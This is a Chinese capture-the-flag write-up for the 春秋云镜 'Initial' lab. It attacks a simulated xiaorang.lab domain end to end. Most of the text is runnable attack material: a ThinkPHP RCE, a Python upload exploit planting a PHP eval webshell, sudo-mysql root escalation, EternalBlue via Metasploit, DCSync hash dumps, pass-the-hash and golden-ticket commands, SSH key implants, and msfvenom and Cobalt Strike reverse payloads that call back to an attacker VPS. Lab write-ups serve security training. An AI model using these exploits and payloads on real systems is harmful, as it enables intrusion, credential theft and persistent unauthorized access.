春秋云镜 Initial WP
春秋云镜 Initial WP
初次方法
指纹识别:thinkphp
先弱口令尝试一波,无果
然后再尝试注册,点击注册没有反应
利用fscan扫描
先用蓝鲸的thinkphp综合利用工具,无果
然后再用莲花的thinkphp综合利用工具,检测出RCE
蚁剑连接
然后利用蚁剑上传哥斯拉的木马
然后利用哥斯拉上传fscan
查看内外网段
fscan扫描
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.1.2 is alive
(icmp) Target 172.22.1.15 is alive
(icmp) Target 172.22.1.21 is alive
(icmp) Target 172.22.1.18 is alive
[*] Icmp alive hosts len is: 4
172.22.1.18:80 open
172.22.1.18:445 open
172.22.1.21:445 open
172.22.1.2:445 open
172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.21:139 open
172.22.1.18:135 open
172.22.1.21:135 open
172.22.1.2:135 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.18:3306 open
172.22.1.2:88 open
[*] alive ports len is: 14
start vulscan
[*] NetInfo:
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] NetInfo:
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] NetInfo:
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] WebTitle: http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] NetBios: 172.22.1.2 [+]DC DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[+] 172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] WebTitle: http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
查找提权的方法
先找suid提权
然后再找sudo提权
sudo mysql -e '\! ls -al /root'
sudo mysql -e '\! ls -al /root/flag'
sudo mysql -e '\! cat /root/flag/f*'
flag{60b53231-
上传frpc和frpc.ini搭建socks5隧道
http://172.22.1.18/?m=login
弱口令admin admin123
找到利用文章https://blog.csdn.net/solitudi/article/details/118675321
注意poc有两个地方的需要改一下
adminuser和adminpass分别是用户名和密码的base64加密
其次需要知道文件上传到哪一个地方,所以执行的命令是"dir"
1.php内容
<?php eval($_GET["1"]);?>
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir")
print(r.text)
用get的木马写post的木马
http://172.22.1.18/upload/2023-10/10_11380753.php?1=system('echo "<?php eval($_POST[1]);?>" > shell.php');
蚁剑连接 http://172.22.1.18/upload/2023-10/shell.php
在家目录找到了flag
2ce3-4813-87d4-
永恒之蓝
172.22.1.21
刚开始想反弹连接,后来发现目标机器不出网,所以改成正向连接了
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
show options
set rhosts 172.22.1.21
run
导出域内所有用户Hash
load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1000 DC01$ a361a0b9f3bacdb8a0f9d456946fff7b 532480
1104 XIAORANG-OA01$ ce8b2320e2ab87159d73f9a4b792c54f 4096
1108 XIAORANG-WIN7$ 5a5fd0fc9da7a93e723fd86c21eb05ae 4096
hash传递
在家目录下找到flag
proxychains impacket-wmiexec -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang/administrator@172.22.1.2 "type Users\Administrator\flag\flag03.txt"
可以用黄金票据进行权限维持
或者获取krbtgt的sid和ntlm
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /user:krbtgt
导入黄金票据
kiwi_cmd kerberos::golden /user:administrator /domain:xiaorang.lab /sid:S-1-5-21-314492864-3856862959-4045974917-502 /krbtgt:fb812eea13a18b7fcdb8e6d67ddc205b /ptt
或者
load kiwi //加载kiwi模块
golden_ticket_create -d 域名 -k krbtgt用户的Hash -s 域sid -u 需要伪造的域管理员用户名 -t /root/golden.kirbi
kerberos_ticket_list # 查看本地储存的票据
kerberos_ticket_use /root/golden.kirbi # 将票据注入内存
看别的师傅的WP的其他方法
1.phpmyadmin 日志写马
http://172.22.1.18/phpmyadmin/
弱口令root root
日志写马
show variables like 'general%';
set global general_log = ON;
设置日志保存的位置
set global general_log_file="C:/phpStudy/PHPTutorial/WWW/shell2.php";
然后插入一句话木马
select '<?php eval($_POST[1]);?>';
2.如果先打永恒之蓝的话可以通过哈希传递攻击入侵到信呼OA的那台服务器
proxychains impacket-wmiexec xiaorang.lab/administrator@172.22.1.18 -hashes :10cf89a850fb1cdbe6bb432b859164c8
3.反弹shell和ssh写公钥
curl ip.sb
发现目标出网
php反弹shell
然后
python3 -c 'import pty; pty.spawn("/bin/bash")'
sudo -l
sudo mysql -e '\! bash -i'
生成ssh公钥
ssh-keygen -t rsa
读取公钥
cat /root/.ssh/id_rsa.pub
写入公钥
echo 'ssh-rsa AAA...3U= root@kali' > /root/.ssh/authorized_keys
然后在kali中可以直接ssh连接
ssh root@39.99.226.236
上bloodhound进行域内信息收集
https://github.com/BloodHoundAD/SharpHound/releases
上传 SharpHound.exe
upload /root/SharpHound.exe C:/SharpHound.exe
shell C:/SharpHound.exe -c all
download C:/xxxBloodHound.zip
4.msf专场(socks5代理不怎么好使)
在第一次thinkphp的getshell后
拿下第一台linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=vpsip LPORT=6666 -f elf -o msflinux
然后
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost vpsip
set lport 6666
run
msf的正向木马
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=6666 -f exe -o bind.exe
如果是反向的话
msfvenom -p windows/meterpreter/reverse_tcp LHOST=vpsip LPORT=6666 -f exe -o re.exe
现在利用msf进行socks5代理
添加路由
route
background
route add 172.22.1.0 255.255.0.0 1
再开启一个socks5服务
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set srvport 1081
run
然后在127.0.0.1:1081就可以开启一个socks5服务了
参考文章:https://xz.aliyun.com/t/12115
5.cs(linux)主场(socks4代理不怎么好使)
利用cobaltstrike拿下第一台linux服务器
下载CrossC2-GithubBot-.cna,genCrossC2.Linux,CrossC2Kit-GithubBot-.zip
https://github.com/gloxec/CrossC2
配置好CrossC2-GithubBot-.cna
将CrossC2-GithubBot-.cna和CrossC2Kit-GithubBot-.zip里的.cna全配置到cobaltstrike里
创建https的监听器
然后建立反弹连接
然后生成木马(如果生成失败可以换一个linux服务器生成)
./genCrossC2.Linux vpsip 444 ./.cobaltstrike.beacon_keys null Linux x64 cslinux
踩坑:木马在虚拟机中拿不出来
解决:
先分割成小块
split -n 2 cslinux
然后合起来到放别的地方
cat x* > /home/kali/Desktop/cslinux
上传到第一个linux服务器,上线
chmod u+x cslinux
./cslinux
cs进行socks4代理
socks 1080
cs的黄金票据
hashdump
然后创建黄金票据注入到当前回话
然后可以hash传递
proxychains impacket-wmiexec -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang/administrator@172.22.1.2 "type Users\Administrator\flag\flag03.txt"
如果要上线macos的话
https://mp.weixin.qq.com/s/e_h_RLNQ4y1l4hYEENG31g